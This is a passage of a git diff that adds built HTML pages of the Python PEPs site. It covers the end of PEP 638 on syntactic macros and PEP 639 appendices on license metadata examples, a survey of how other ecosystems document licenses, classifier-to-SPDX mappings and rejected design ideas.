+    if isinstance(node, Num):
+        return node.n
+    $$match_4_0 = node
+    if isinstance($$match_4_0, _ast.Add):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) + calculate(b)
+    elif isinstance($$match_4_0, _ast.Sub):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) - calculate(b)
+    elif isinstance($$match_4_0, _ast.Mul):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) * calculate(b)
+    elif isinstance($$match_4_0, _ast.Div):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) / calculate(b)
+
+
+
+
+

Zero-cost markers and annotations

+

Annotations, either decorators or PEP 3107 function annotations, have a runtime cost +even if they serve only as markers for checkers or as documentation.

+
@do_nothing_marker
+def foo(...):
+    ...
+
+
+

can be replaced with the zero-cost macro:

+
do_nothing_marker!:
+def foo(...):
+    ...
+
+
+
+
+

Prototyping language extensions

+

Although macros would be most valuable for domain-specific extensions, it is possible to +demonstrate possible language extensions using macros.

+
+
f-strings:
+

The f-string f"..." could be implemented as macro as f!("..."). +Not quite as nice to read, but would still be useful for experimenting with.

+
+
+
Try finally statement:
+
try_!:
+    body
+finally!:
+    closing
+
+
+

Would be translated roughly as:

+
try:
+    body
+except:
+    closing
+else:
+    closing
+
+
+
+
Note:
Care must be taken to handle returns, breaks and continues correctly. +The above code is merely illustrative.
+
+
+
+
With statement:
+
with! open(filename) as fd:
+    return fd.read()
+
+
+

The above would require handling open specially. +An alternative that would be more explicit, would be:

+
with! open!(filename) as fd:
+    return fd.read()
+
+
+
+
+
+

Macro definition macros

+

Languages that have syntactic macros usually provide a macro for defining macros. +This PEP intentionally does not do that, as it is not yet clear what a good design +would be, and we want to allow the community to define their own macros.

+

One possible form could be:

+
macro_def! name:
+    input:
+        ... # input pattern, defining meta-variables
+    output:
+        ... # output pattern, using meta-variables
+
+
+
+
+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+
+

Performance Implications

+

For code that doesn’t use macros, there will be no effect on performance.

+

For code that does use macros and has already been compiled to bytecode, +there will be some slight overhead to check that the version +of macros used to compile the code match the imported macro processors.

+

For code that has not been compiled, or compiled with different versions +of the macro processors, then there would be the usual overhead of bytecode +compilation, plus any additional overhead of macro processing.

+

It is worth noting that the speed of source to bytecode compilation +is largely irrelevant for Python performance.

+
+
+

Implementation

+

In order to allow transformation of the AST at compile time by Python code, +all AST nodes in the compiler will have to be Python objects.

+

To do that efficiently, will mean making all the nodes in the _ast module +immutable, so as not degrade performance by much. +They will need to be immutable to guarantee that the AST remains a tree +to avoid having to support cyclic GC. +Making them immutable means they will not have a +__dict__ attribute, making them compact.

+

AST nodes in the ast module will remain mutable.

+

Currently, all AST nodes are allocated using an arena allocator. +Changing to use the standard allocator might slow compilation down a little, +but has advantages in terms of maintenance, as much code can be deleted.

+
+

Reference Implementation

+

None as yet.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0638.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-examples/index.html b/pep-0639/appendix-examples/index.html new file mode 100644 index 00000000000..b0a6bcddf8b --- /dev/null +++ b/pep-0639/appendix-examples/index.html @@ -0,0 +1,271 @@ + + + + + + + + Appendix: Licensing Examples | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: Licensing Examples

+
+

Abstract

+

This document contains guidance on PEP 639 application in the +real-life examples.

+
+
+

Examples

+
+

Basic example

+

The Setuptools project itself, as of version 59.1.1, +does not use the License field in its own project source metadata. +Further, it no longer explicitly specifies license_file/license_files +as it did previously, since Setuptools relies on its own automatic +inclusion of license-related files matching common patterns, +such as the LICENSE file it uses.

+

It includes the following license-related metadata in its setup.cfg:

+
[metadata]
+classifiers =
+    License :: OSI Approved :: MIT License
+
+
+

The simplest migration to PEP 639 would consist of using this instead:

+
[metadata]
+license_expression = MIT
+
+
+

Or, in the [project] table of pyproject.toml:

+
[project]
+license = "MIT"
+
+
+

The output Core Metadata for the distribution packages would then be:

+
License-Expression: MIT
+License-File: LICENSE
+
+
+

The LICENSE file would be stored at /setuptools-${VERSION}/LICENSE +in the sdist and /setuptools-${VERSION}.dist-info/licenses/LICENSE +in the wheel, and unpacked from there into the site directory (e.g. +site-packages) on installation; / is the root of the respective archive +and ${VERSION} the version of the Setuptools release in the Core Metadata.

+
+
+

Advanced example

+

Suppose Setuptools were to include the licenses of the third-party projects +that are vendored in the setuptools/_vendor/ and pkg_resources/_vendor +directories; specifically:

+
packaging==21.2
+pyparsing==2.2.1
+ordered-set==3.1.1
+more_itertools==8.8.0
+
+
+

The license expressions for these projects are:

+
packaging: Apache-2.0 OR BSD-2-Clause
+pyparsing: MIT
+ordered-set: MIT
+more_itertools: MIT
+
+
+

A comprehensive license expression covering both Setuptools +proper and its vendored dependencies would contain these metadata, +combining all the license expressions into one. Such an expression might be:

+
MIT AND (Apache-2.0 OR BSD-2-Clause)
+
+
+

In addition, per the requirements of the licenses, the relevant license files +must be included in the package. Suppose the LICENSE file contains the text +of the MIT license and the copyrights used by Setuptools, pyparsing, +more_itertools and ordered-set; and the LICENSE* files in the +setuptools/_vendor/packaging/ directory contain the Apache 2.0 and +2-clause BSD license text, and the Packaging copyright statement and +license choice notice.

+

Specifically, we assume the license files are located at the following +paths in the project source tree (relative to the project root and +pyproject.toml):

+
LICENSE
+setuptools/_vendor/packaging/LICENSE
+setuptools/_vendor/packaging/LICENSE.APACHE
+setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

Putting it all together, our setup.cfg would be:

+
[metadata]
+license_expression = MIT AND (Apache-2.0 OR BSD-2-Clause)
+license_files =
+    LICENSE
+    setuptools/_vendor/packaging/LICENSE
+    setuptools/_vendor/packaging/LICENSE.APACHE
+    setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

In the [project] table of pyproject.toml, license files +can be specified via glob patterns:

+
[project]
+license = "MIT AND (Apache-2.0 OR BSD-2-Clause)"
+license-files = [
+    "LICENSE*",
+    "setuptools/_vendor/LICENSE*",
+]
+
+
+

Or alternatively, they can be specified explicitly (paths will be interpreted +as glob patterns):

+
[project]
+license = "MIT AND (Apache-2.0 OR BSD-2-Clause)"
+license-files = [
+    "LICENSE",
+    "setuptools/_vendor/LICENSE",
+    "setuptools/_vendor/LICENSE.APACHE",
+    "setuptools/_vendor/LICENSE.BSD",
+]
+
+
+

With either approach, the output Core Metadata in the distribution +would be:

+
License-Expression: MIT AND (Apache-2.0 OR BSD-2-Clause)
+License-File: LICENSE
+License-File: setuptools/_vendor/packaging/LICENSE
+License-File: setuptools/_vendor/packaging/LICENSE.APACHE
+License-File: setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

In the resulting sdist, with / as the root of the archive and ${VERSION} +the version of the Setuptools release specified in the Core Metadata, +the license files would be located at the paths:

+
/setuptools-${VERSION}/LICENSE
+/setuptools-${VERSION}/setuptools/_vendor/packaging/LICENSE
+/setuptools-${VERSION}/setuptools/_vendor/packaging/LICENSE.APACHE
+/setuptools-${VERSION}/setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

In the built wheel, with / being the root of the archive and +${VERSION} as the previous, the license files would be stored at:

+
/setuptools-${VERSION}.dist-info/licenses/LICENSE
+/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE
+/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.APACHE
+/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

Finally, in the installed project, with site-packages being the site dir +and ${VERSION} as the previous, the license files would be installed to:

+
site-packages/setuptools-${VERSION}.dist-info/licenses/LICENSE
+site-packages/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE
+site-packages/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.APACHE
+site-packages/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.BSD
+
+
+
+
+

Expression examples

+

Some additional examples of valid License-Expression values:

+
License-Expression: MIT
+License-Expression: BSD-3-Clause
+License-Expression: MIT AND (Apache-2.0 OR BSD-2-clause)
+License-Expression: MIT OR GPL-2.0-or-later OR (FSFUL AND BSD-2-Clause)
+License-Expression: GPL-3.0-only WITH Classpath-Exception-2.0 OR BSD-3-Clause
+License-Expression: LicenseRef-Public-Domain OR CC0-1.0 OR Unlicense
+License-Expression: LicenseRef-Proprietary
+License-Expression: LicenseRef-Custom-License
+
+
+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-license-survey/index.html b/pep-0639/appendix-license-survey/index.html new file mode 100644 index 00000000000..80b165a8cf2 --- /dev/null +++ b/pep-0639/appendix-license-survey/index.html @@ -0,0 +1,365 @@ + + + + + + + + Appendix: License Documentation in Python and Other Projects | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: License Documentation in Python and Other Projects

+
+

Abstract

+

There are multiple ways used or recommended to document licenses. +This document contains the results of a comprehensive survey of license +documentation in Python and other languages.

+

The key takeaways from the survey, which have guided the recommendations of +PEP 639, are as follows:

+
    +
  • Most package formats use a single License field.
  • +
  • Many modern package systems use some form of license expression +to optionally combine more than one license identifier together. +SPDX and SPDX-like syntaxes are the most popular in use.
  • +
  • SPDX license identifiers are becoming the de facto way to reference common +licenses everywhere, whether or not a full license expression syntax is used.
  • +
  • Several package formats support documenting both a license expression and the +paths of the corresponding files that contain the license text. Most Free and +Open Source Software licenses require package authors to include their full +text in a Distribution Package.
  • +
+
+
+

License Documentation in Python

+
+

Core Metadata

+

There are two overlapping Core Metadata fields to document a license: the +license Classifier strings prefixed with License :: +and the License field as free text.

+

The Core Metadata License field documentation is currently:

+
License
+=======
+
+.. versionadded:: 1.0
+
+Text indicating the license covering the distribution where the license
+is not a selection from the "License" Trove classifiers. See
+:ref:`"Classifier" <metadata-classifier>` below.
+This field may also be used to specify a
+particular version of a license which is named via the ``Classifier``
+field, or to indicate a variation or exception to such a license.
+
+Examples::
+
+    License: This software may only be obtained by sending the
+            author a postcard, and then the user promises not
+            to redistribute it.
+
+    License: GPL version 3, excluding DRM provisions
+
+
+

Even though there are two fields, it is at times difficult to convey anything +but simpler licensing. For instance, some classifiers lack precision +(GPL without a version) and when multiple license classifiers are +listed, it is not clear if both licenses must apply, or the user may choose +between them. Furthermore, the list of available license classifiers +is rather limited and out-of-date.

+
+
+

Setuptools and Wheel

+

Beyond a license code or qualifier, license text files are documented and +included in a built package either implicitly or explicitly, +and this is another possible source of confusion:

+
    +
  • In the Setuptools and Wheel projects, +license files are automatically added to the distribution (at their source +location in a source distribution/sdist, and in the .dist-info +directory of a built wheel) if they match one of a number of common license +file name patterns (LICEN[CS]E*, COPYING*, NOTICE* and +AUTHORS*). Alternatively, a package author can specify a list of license +file paths to include in the built wheel under the license_files key in +the [metadata] section of the project’s setup.cfg, or as an argument +to the setuptools.setup() function. At present, following the Wheel +project’s lead, Setuptools flattens the collected license files into the +metadata directory, clobbering files with the same name, and dumps license +files directly into the top-level .dist-info directory, but there is a +desire to resolve both these issues, +contingent on PEP 639 being accepted.
  • +
  • Both tools also support an older, singular license_file parameter that +allows specifying only one license file to add to the distribution, which +has been deprecated for some time but still sees some use.
  • +
  • Following the publication of an earlier draft of PEP 639, Setuptools +added support for License-File in distribution +metadata as described in this specification. This allows other tools +consuming the resulting metadata to unambiguously locate the license file(s) +for a given package.
  • +
+
+
+

PyPA Packaging Guide and Sample Project

+

Both the PyPA beginner packaging tutorial and its more +comprehensive packaging guide state that it is +important that every package include a license file. They point to the +LICENSE.txt in the official PyPA sample project as an example, which is +explicitly listed under the license_files key in +its setup.cfg, following existing practice formally specified by PEP 639.

+

Both the beginner packaging tutorial and the +sample project only use classifiers to declare a +package’s license, and do not include or mention the License field. +The full packaging guide does mention this field, but +states that authors should use the license classifiers instead, unless the +project uses a non-standard license (which the guide discourages).

+
+
+

Python source code files

+

Note: Documenting licenses in source code is not in the scope of PEP 639.

+

Beside using comments and/or SPDX-License-Identifier conventions, the +license is sometimes documented in Python code files using +a “dunder” module-level constant, typically named __license__.

+

This convention, while perhaps somewhat antiquated, is recognized by the +built-in help() function and the standard pydoc module. +The dunder variable will show up in the help() DATA section for a module.

+
+
+
+

License Documentation in Other Projects

+
+

Linux distribution packages

+

Note: in most cases, the texts of the most common licenses are included +globally in a shared documentation directory (e.g. /usr/share/doc).

+
    +
  • Debian documents package licenses with +machine readable copyright files. +It defines its own license expression syntax and list of identifiers for +common licenses, both of which are closely related to those of SPDX.
  • +
  • Fedora packages specify how to include +License Texts and use a +License field that must be filled +with appropriate short license identifier(s) from an extensive list +of “Good Licenses”. Fedora uses SPDX +license expression syntax.
  • +
  • OpenSUSE packages use SPDX license expressions with +SPDX license IDs and a +list of additional license identifiers.
  • +
  • Gentoo ebuild uses a LICENSE variable. +This field is specified in GLEP-0023 and in the +Gentoo development manual. +Gentoo also defines a list of allowed licenses and a license expression +syntax, which is rather different from SPDX.
  • +
  • The FreeBSD package Makefile provides LICENSE and +LICENSE_FILE fields with a list of custom license symbols. For +non-standard licenses, FreeBSD recommends using LICENSE=UNKNOWN and +adding LICENSE_NAME and LICENSE_TEXT fields, as well as sophisticated +LICENSE_PERMS to qualify the license permissions and LICENSE_GROUPS +to document a license grouping. The LICENSE_COMB allows documenting more +than one license and how they apply together, forming a custom license +expression syntax. FreeBSD also recommends the use of +SPDX-License-Identifier in source code files.
  • +
  • Arch Linux PKGBUILD defines its +own license identifiers. +The value 'unknown' can be used if the license is not defined.
  • +
  • OpenWRT ipk packages use the PKG_LICENSE and +PKG_LICENSE_FILES variables and recommend the use of SPDX License +identifiers.
  • +
  • NixOS uses SPDX identifiers and some extra license IDs +in its license field.
  • +
  • GNU Guix (based on NixOS) has a single License field, uses its own +license symbols list and specifies how to use one license or a +list of them.
  • +
  • Alpine Linux packages recommend using SPDX identifiers in the +license field.
  • +
+
+
+

Language and application packages

+
    +
  • In Java, Maven POM defines a licenses XML tag with a list +of licenses, each with a name, URL, comments and “distribution” type. +This is not mandatory, and the content of each field is not specified.
  • +
  • The JavaScript NPM package.json uses a single license field with +a SPDX license expression, or the UNLICENSED ID if none is specified. +A license file can be referenced as an alternative using +SEE LICENSE IN <filename> in the single license field.
  • +
  • Rubygems gemspec specifies either a single or list of license +strings. The relationship between multiple licenses in a +list is not specified. They recommend using SPDX license identifiers.
  • +
  • CPAN Perl modules use a single license field, which is either a +single or a list of strings. The relationship between the licenses in +a list is not specified. There is a list of custom license identifiers plus +these generic identifiers: open_source, restricted, unrestricted, +unknown.
  • +
  • Rust Cargo specifies the use of an SPDX license expression +(v2.1) in the license field. It also supports an alternative expression +syntax using slash-separated SPDX license identifiers, and there is also a +license_file field. The crates.io package registry +requires that either license or license_file fields are set when +uploading a package.
  • +
  • PHP composer.json uses a license field with +an SPDX license ID or proprietary. The license field is either a +single string with resembling the SPDX license expression syntax with +and and or keywords; or is a list of strings if there is a +(disjunctive) choice of licenses.
  • +
  • NuGet packages previously used only a simple license URL, but +now specify using a SPDX license expression and/or the path to a license +file within the package. The NuGet.org repository states that they only +accept license expressions that are “approved by the Open Source Initiative +or the Free Software Foundation.”
  • +
  • Go language modules go.mod have no provision for any metadata beyond +dependencies. Licensing information is left for code authors and other +community package managers to document.
  • +
  • The Dart/Flutter spec recommends using a single LICENSE +file that should contain all the license texts, each separated by a line +with 80 hyphens.
  • +
  • The JavaScript Bower license field is either a single string +or list of strings using either SPDX license identifiers, or a path/URL +to a license file.
  • +
  • The Cocoapods podspec license field is either a single +string, or a mapping with type, file and text keys. +This is mandatory unless there is a LICENSE/LICENCE file provided.
  • +
  • Haskell Cabal accepts an SPDX license expression since +version 2.2. The version of the SPDX license list used is a function of +the Cabal version. The specification also provides a mapping between +legacy (pre-SPDX) and SPDX license Identifiers. Cabal also specifies a +license-file(s) field that lists license files to be installed with +the package.
  • +
  • Erlang/Elixir mix/hex package specifies a licenses field as a +required list of license strings, and recommends using SPDX license +identifiers.
  • +
  • D Langanguage dub packages define their own list of license +identifiers and license expression syntax, similar to the SPDX standard.
  • +
  • The R Package DESCRIPTION defines its own sophisticated license +expression syntax and list of licenses identifiers. R has a unique way of +supporting specifiers for license versions (such as LGPL (>= 2.0, < 3)) +in its license expression syntax.
  • +
+
+
+

Other ecosystems

+
    +
  • The SPDX-License-Identifier header is a simple +convention to document the license inside a file.
  • +
  • The Free Software Foundation (FSF) promotes the use of +SPDX license identifiers for clarity in the GPL and other +versioned free software licenses.
  • +
  • The Free Software Foundation Europe (FSFE) REUSE project +promotes using SPDX-License-Identifier.
  • +
  • The Linux kernel uses SPDX-License-Identifier +and parts of the FSFE REUSE conventions to document its licenses.
  • +
  • U-Boot spearheaded using SPDX-License-Identifier in code +and now follows the Linux approach.
  • +
  • The Apache Software Foundation projects use RDF DOAP with +a single license field pointing to SPDX license identifiers.
  • +
  • The Eclipse Foundation promotes using +SPDX-license-Identifiers.
  • +
  • The ClearlyDefined project promotes using SPDX +license identifiers and expressions to improve license clarity.
  • +
  • The Android Open Source Project uses MODULE_LICENSE_XXX +empty tag files, where XXX is a license code such as BSD, APACHE, +GPL, etc. It also uses a NOTICE file that contains license and +notice texts.
  • +
+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-mapping-classifiers/index.html b/pep-0639/appendix-mapping-classifiers/index.html new file mode 100644 index 00000000000..219f076a418 --- /dev/null +++ b/pep-0639/appendix-mapping-classifiers/index.html @@ -0,0 +1,185 @@ + + + + + + + + Appendix: Mapping License Classifiers to SPDX Identifiers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: Mapping License Classifiers to SPDX Identifiers

+

Most single license classifiers (namely, all those not mentioned below) +map to a single valid SPDX license identifier, +allowing tools to infer the SPDX license identifier they correspond to, +both for use when analyzing and auditing packages, +and providing a semi-automated mechanism of filling the license key +or the License-Expression field +following the PEP 639 specification.

+

Some legacy license classifiers intend to specify a particular license, +but do not specify the particular version or variant, leading to a +critical ambiguity +as to their terms, compatibility and acceptability. +Tools MUST NOT attempt to automatically infer a License-Expression +when one of these classifiers is used without affirmative user action:

+
    +
  • License :: OSI Approved :: Academic Free License (AFL)
  • +
  • License :: OSI Approved :: Apache Software License
  • +
  • License :: OSI Approved :: Apple Public Source License
  • +
  • License :: OSI Approved :: Artistic License
  • +
  • License :: OSI Approved :: BSD License
  • +
  • License :: OSI Approved :: GNU Affero General Public License v3
  • +
  • License :: OSI Approved :: GNU Free Documentation License (FDL)
  • +
  • License :: OSI Approved :: GNU General Public License (GPL)
  • +
  • License :: OSI Approved :: GNU General Public License v2 (GPLv2)
  • +
  • License :: OSI Approved :: GNU General Public License v3 (GPLv3)
  • +
  • License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)
  • +
  • License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)
  • +
  • License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)
  • +
  • License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)
  • +
+

A comprehensive mapping of these classifiers to their possible specific +identifiers was assembled by Dustin Ingram, which tools +MAY use as a reference for the identifier selection options to offer users +when prompting the user to explicitly select the license identifier +they intended for their project.

+
+

Note

+

Several additional classifiers, namely the “or later” variants of +the AGPLv3, GPLv2, GPLv3 and LGPLv3, are also listed in the aforementioned +mapping, but unambiguously map to their respective licenses, +and so are not listed here. +However, LGPLv2 is included above, as it could ambiguously +refer to either the distinct v2.0 or v2.1 variants of that license.

+
+

In addition, for the various special cases, the following mappings are +considered canonical and normative for the purposes of this specification:

+
    +
  • Classifier License :: Public Domain MAY be mapped to the generic +License-Expression: LicenseRef-Public-Domain. +If tools do so, they SHOULD issue an informational warning encouraging +the use of more explicit and legally portable license identifiers, +such as those for the CC0 1.0 license (CC0-1.0), +the Unlicense (Unlicense), +or the MIT license (MIT), +since the meaning associated with the term “public domain” is thoroughly +dependent on the specific legal jurisdiction involved, +some of which lack the concept entirely. +Alternatively, tools MAY choose to treat these classifiers as ambiguous.
  • +
  • The generic and sometimes ambiguous classifiers:
      +
    • License :: Free For Educational Use
    • +
    • License :: Free For Home Use
    • +
    • License :: Free for non-commercial use
    • +
    • License :: Freely Distributable
    • +
    • License :: Free To Use But Restricted
    • +
    • License :: Freeware
    • +
    • License :: Other/Proprietary License
    • +
    +

    MAY be mapped to the generic +License-Expression: LicenseRef-Proprietary, +but tools MUST issue a prominent, informative warning if they do so. +Alternatively, tools MAY choose to treat these classifiers as ambiguous.

    +
  • +
  • The generic and ambiguous classifiers License :: OSI Approved and +License :: DFSG approved do not map to any license expression, +and thus tools SHOULD treat them as ambiguous, or if not MUST ignore them.
  • +
  • The classifiers License :: GUST Font License 1.0 and +License :: GUST Font License 2006-09-30 have no mapping to SPDX license +identifiers, and no PyPI package uses them as of 2022-07-09.
  • +
+

When multiple license classifiers are used, their relationship is ambiguous, +and it is typically not possible to determine if all the licenses apply or if +there is a choice that is possible among the licenses, +In this case, tools MUST NOT automatically infer a license expression, +unless one license classifier is a parent of the other, +i.e. the child contains all ::-delineated components of the parent, +in which case tools MAY ignore the parent classifier +but SHOULD issue an informative warning when doing so.

+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-rejected-ideas/index.html b/pep-0639/appendix-rejected-ideas/index.html new file mode 100644 index 00000000000..fd689a45a98 --- /dev/null +++ b/pep-0639/appendix-rejected-ideas/index.html @@ -0,0 +1,613 @@ + + + + + + + + Appendix: Rejected Ideas | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: Rejected Ideas

+
+

Abstract

+

This document contains a list of the alternative ideas to the ones proposed +in PEP 639 with detailed explanations why they were rejected.

+
+
+

Core Metadata fields

+

Potential alternatives to the structure, content and deprecation of the +Core Metadata fields specified in PEP 639.

+
+

Re-use the License field

+

Following initial discussion, earlier versions of +PEP 639 proposed re-using the existing License field, which tools would +attempt to parse as a SPDX license expression with a fallback to free text. +Initially, this would cause a warning and eventually it would be treated as an +error.

+

This would be more backwards-compatibile, allowed a smooth adoption +of SPDX license expressions in the community, +and avoided adding yet another license-related field.

+

Eventually, consensus was reached that a +dedicated License-Expression field was a better approach. +The presence of this field unambiguously signals support for the SPDX +identifiers, without the need for complex heuristics, and allows tools to +easily detect invalid content.

+

Furthermore, it allows both the existing License field and +the license classifiers to be easily deprecated, +with tools able to distinguish between packages conforming to PEP 639 or not, +and adapt their behavior accordingly.

+

Finally, it avoids changing the behavior of an existing metadata field, +and avoids tools having to guess the Metadata-Version and field behavior +based on its value rather than merely its presence.

+

Distributions which already contain valid SPDX license expressions in the +License fields will not automatically be recognized as such. +The migration is simple though, and PEP 639 provides +guidance on how this can be done automatically by tooling.

+
+
+

Re-Use the License field with a value prefix

+

As an alternative to the previous, prefixing SPDX license expressions with, +e.g. spdx: was suggested to reduce the ambiguity of re-using +the License field. However, this effectively amounted to creating +a field within a field, and doesn’t address the downsides of +keeping the License field. Namely, it still changes the behavior of an +existing metadata field, requires tools to parse its value +to determine how to handle its content, and makes the specification and +deprecation process more complex and less clean.

+

Projects currently using valid SPDX identifiers in the License +field won’t be automatically recognized, and require +about the same amount of effort to fix as in the case of introducing a new +field, namely changing a line in the +project’s source metadata. Therefore, it was rejected in favor of a new field.

+
+
+

Don’t make License-Expression mutually exclusive

+

For backwards compatibility, the License field and/or the license +classifiers could still be allowed together with the new +License-Expression field, presumably with a warning. However, this +could easily lead to inconsistent +license metadata in no less than three different fields, which is +contrary to the goal of PEP 639 of making the licensing story +unambiguous. Therefore, with the community +consensus this idea was rejected.

+
+
+

Don’t deprecate existing License field and classifiers

+

Several community members were concerned that deprecating the +existing License field and classifiers would result in +much churn for package authors and raise the barrier to +entry for new ones, particularly developers seeking to +package their personal projects without caring +too much about the legal technicalities. +Indeed, every deprecation should be carefully considered relative to the +long-term +net benefit. At the minimum, this change shouldn’t make it more +difficult for a Python developer to share their work under +a license of their choice, and ideally improve the situation.

+

Following many rounds of discussion, +the general consensus was in favor of deprecating the legacy +means of specifying a license and in favor of “one obvious way to do it”. +Not doing so would leave three different un-deprecated ways of +specifying a license for a package, two of them ambiguous, +inconsistently documented and out of date. +This is more complex for tools to support +indefinitely, resulting in a non-trivial maintenance cost.

+

Finally, for unmaintained packages, those using tools supporting older +metadata versions, or those who choose not to provide license metadata, +no changes are required regardless of the deprecation.

+
+
+

Don’t mandate validating new fields on PyPI

+

Previously, PEP 639 did not provide specific guidance +for PyPI (or other package indices) as to whether and how they +should validate the License-Expression or License-File fields, +nor how they should handle using them in combination with the deprecated +License field or license classifiers. This simplifies the specification +and defers implementation on PyPI to a later PEP to minimize +disruption to package authors.

+

This was in place for an earlier draft of PEP 639 which didn’t separate +License-Expression from the License field. The validation would have +been difficult and backwards-incompatible, breaking existing packages. +With the current proposal, there was a clear consensus that +the new field should be validated from the start, guaranteeing that all +distributions uploaded to PyPI that declare Core Metadata version 2.4 +or higher and have the License-Expression field will have a valid +expression, such that PyPI and consumers of its packages and metadata +can rely upon to follow the specification here.

+

The same can be extended to the new License-File field as well, +to ensure that it is valid and the legally required license files are +present. To be clear, this would not require that any uploaded distribution +have such metadata, only that if they choose to declare it per the +specification in PEP 639, it is assured to be valid.

+
+
+
+

Source metadata license key

+

Alternative possibilities related to the license key in the +pyproject.toml project source metadata.

+
+

Add new subkeys to table

+

There were proposals to add various subkeys to the table. +Combining different types of metadata which require different handling, +adding new guidance regarding the subkeys mutual exclusivity and +the possibility to define some of them as dynamic would make the +transition harder and create more confusion rather than clarity for the users. +This approach has been rejected in favour of more flat pyproject.toml +design, clear mapping between pyproject.toml keys and Core Metadata fields, +and increased readability of the separate keys.

+

Rejected proposals:

+
    +
  • add expression and files subkeys to table
  • +
  • add an expression subkey instead of a string value
  • +
  • add a type key to treat text as expression
  • +
+
+
+

Define a new top-level license-expression key

+

An earlier version of PEP 639 defined a new, top-level license-expression +under the [project] table, +rather than using the string value of the license key. +This was seen as clearer for readers and writers, +in line with the goals of PEP 639.

+

While differences from existing tool formats (and Core Metadata +field names) have precedent in PEP 621, repurposing an existing key to mean +something different (and map to a different Core Metadata field), +with distinct and incompatible syntax does not, +and could cause ambiguity for readers and authors.

+

Also, per the project source metadata spec, +this would allow separately marking the [project] keys +corresponding to the License and License-Expression metadata fields +as dynamic, +avoiding a potential concern with back-filling the License field +from the License-Expression field as PEP 639 currently allows +without it as license as dynamic +(which would not be possible, since they both map to the same top-level key).

+

However, community consensus favored using +the top-level string value of the existing license key, +as reserved for this purpose by PEP 621:

+
+
A practical string value for the license key has been purposefully left +out to allow for a future PEP to specify support for SPDX expressions +(the same logic applies to any sort of “type” field specifying what +license the file or text represents).
+

This is simpler for users to remember and type, +avoids adding a new top-level key while taking advantage of an existing one, +guides users toward using a license expression as the default, +and follows what was envisioned in the original PEP 621.

+

Additionally, this allows cleanly deprecating the table values +without deprecating the key itself, +and makes them mutually exclusive without users having to remember +and tools having to enforce it.

+

Finally, consistency with other tool formats and the underlying Core Metadata +was not a sufficient priority +to override the advantages of using the existing key, +and the dynamic concerns were mostly mitigated by +not specifying legacy license to license expression conversion at build time, +explicitly specifying backfilling the License field when not dynamic, +and the fact that both fields are mutually exclusive, +so there is little practical need to distinguish which is dynamic.

+

Therefore, a top-level string value for license was adopted for PEP 639, +as an earlier working draft had temporarily specified.

+
+
+
+

Source metadata license-files key

+

Alternatives considered for the license-files key in the +pyproject.toml [project] table, primarily related to the +path/glob type handling.

+
+

Define mutually exclusve paths and globs subkeys to license-files

+

A previous draft of the PEP specified mutually exclusive paths and +globs subkeys of the license-files [project] table key. +This was proposed to achieve the maximum clarity of the defined values for +both users and tools. +Allowing license files to be specified as literal paths would avoid edge cases, +such as those containing glob characters +(or those confusingly similar to them, as described in PEP 672).

+

However, this approach introduces an extra level of nesting - in the very same +way that PEP 639 removes from the license key. This creates more burden +on project authors who need to disambiguate and choose one or the other +approach to specify their license files location. It was pointed out that +it is easily possible to incorrectly assume that paths also support +globs.

+

Therefore, it was decided against this approach in favor of a flat array value +which simplifies the specification and implementation, +and more closely matches the configuration format of existing tools. +The PEP recommends not to use other than alphanumerical symbols and dot +(.) in the filenames to not create confusion +when interpreting glob patterns.

+
+
+

Only accept verbatim paths

+

Globs could be disallowed as values to the license-files +key in pyproject.toml and only verbatim paths allowed. +This would ensure that all license files are explicitly specified, +found and included, and the source metadata +is completely static in the strictest sense of the term, without tools +having to inspect the rest of the project source files to determine exactly +what license files will be included and what the License-File values +will be. This would also simplify the spec and tool implementation.

+

However, practicality beats purity here. Globs are already supported +by many existing tools, and explicitly +specifying the full path to every license file would be unnecessarily tedious +for complex projects with vendored dependencies. More +critically, it would make it much easier to accidentally miss a required +legal file, creating the package illegal to distribute.

+

Tools can still determine the files to be included, +based only on the glob patterns the user specified and the +filenames in the package, without installing it, executing its code or even +examining its files. +And, of course, sdists, wheels and others will have the full static list +of files specified in their distribution metadata.

+
+
+

